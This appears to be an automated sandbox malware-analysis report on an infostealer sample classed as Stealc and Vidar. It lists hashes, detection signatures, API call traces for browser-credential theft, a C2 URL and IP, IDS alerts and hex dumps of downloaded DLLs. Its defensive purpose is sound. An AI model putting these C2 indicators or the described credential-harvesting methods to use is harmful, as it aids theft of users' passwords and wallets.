Windows Analysis Report
FFAk2gixx5.exe

Overview

General Information

Sample name:	FFAk2gixx5.exe renamed because original name is a hash value
Original sample name:	14cd6d9cbad80b0e4076212bf7ad937f.exe
Analysis ID:	1436574
MD5:	14cd6d9cbad80b0e4076212bf7ad937f
SHA1:	6f553fad2fd973d52dec55582490eb8c3a35b6e1
SHA256:	1738d5ec9cf4a62d3bebdb8690d208dc4e9bb957ba427233920a2195b04bb52e
Tags:	exeStealc
Infos:

Detection

Mars Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Mars stealer

Yara detected Stealc

Yara detected Vidar stealer

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to harvest and steal browser information (history, passwords, etc)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file does not import any functions

PE file overlay found

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://okkolus.com/cf5cbdf706840b3f.php	Avira URL Cloud: Label: malware
Source: http://okkolus.com/cf5cbdf706840b3f.php/M	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": "http://okkolus.com/cf5cbdf706840b3f.php"}

Multi AV Scanner detection for domain / URL

Source: okkolus.com	Virustotal: Detection: 10%	Perma Link
Source: http://okkolus.com	Virustotal: Detection: 10%	Perma Link
Source: http://okkolus.com/cf5cbdf706840b3f.php	Virustotal: Detection: 13%	Perma Link
Source: http://okkolus.com/dfaf16606234b71d/nss3.dlle	Virustotal: Detection: 5%	Perma Link

Multi AV Scanner detection for submitted file

Source: FFAk2gixx5.exe	ReversingLabs: Detection: 71%
Source: FFAk2gixx5.exe	Virustotal: Detection: 68%			Perma Link

Machine Learning detection for sample

Source: FFAk2gixx5.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: CtIvEWInDoW
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: AgEBOxw
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: OsUse
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: }@@@e$@@
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: ijklmnopqrs
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: L 45`vy`ty`tx`sp@@@@<@@@
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: >22lmnopq((\]^_`abcdefghijklmnopqrs
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: %s\%_
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: %s\%]
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: ijklmnopqrs
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: [EGEKM^Ywxyztasc}567y9n/S
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: jAss}ord
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: '!#!/!#{\|}
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: `o^UFF
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: {K}ri*#
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: advapi32.dll
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: HeapFree
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: ntProcessId
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: wininet.dll
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: shlwapi.dll
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: shell32.dll
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: .dll
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: khrc7C9Pm
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: column_text
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: login:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00409540
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00406C10
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_004094A0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00415590 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_00415590
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,	0_2_0040BF90
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FC6E77 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_02FC6E77
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD57F7 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_02FD57F7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FC97A7 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_02FC97A7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FC9707 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_02FC9707
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FCC1F7 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,	0_2_02FCC1F7

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Unpacked PE file: 0.2.FFAk2gixx5.exe.400000.0.unpack

Uses 32bit PE files

Source: FFAk2gixx5.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: mozglue.pdbP source: mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: mozglue.pdb source: mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,GetSystemTimes,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040B610
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040DB60
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040D540
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00412570
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040D1C0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_004015C0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_004121F0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00411650
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00411B80
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD27D7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_02FD27D7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FCD7A7 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_02FCD7A7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD18B7 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_02FD18B7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FCB877 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_02FCB877
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD2457 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_02FD2457
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FC1827 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_02FC1827
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FCD427 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_02FCD427
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD1DE7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_02FD1DE7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FCDDC7 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_02FCDDC7

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.6:49706 -> 31.41.44.147:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.6:49707 -> 31.41.44.147:80
Source: Traffic	Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 31.41.44.147:80 -> 192.168.2.6:49707
Source: Traffic	Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.6:49708 -> 31.41.44.147:80
Source: Traffic	Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 31.41.44.147:80 -> 192.168.2.6:49708

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://okkolus.com/cf5cbdf706840b3f.php

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 18:30:30 GMTETag: "10e436-5e7f2463c1d80"Accept-Ranges: bytesContent-Length: 1106998Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "a7550-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 685392Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "94750-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 608080Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 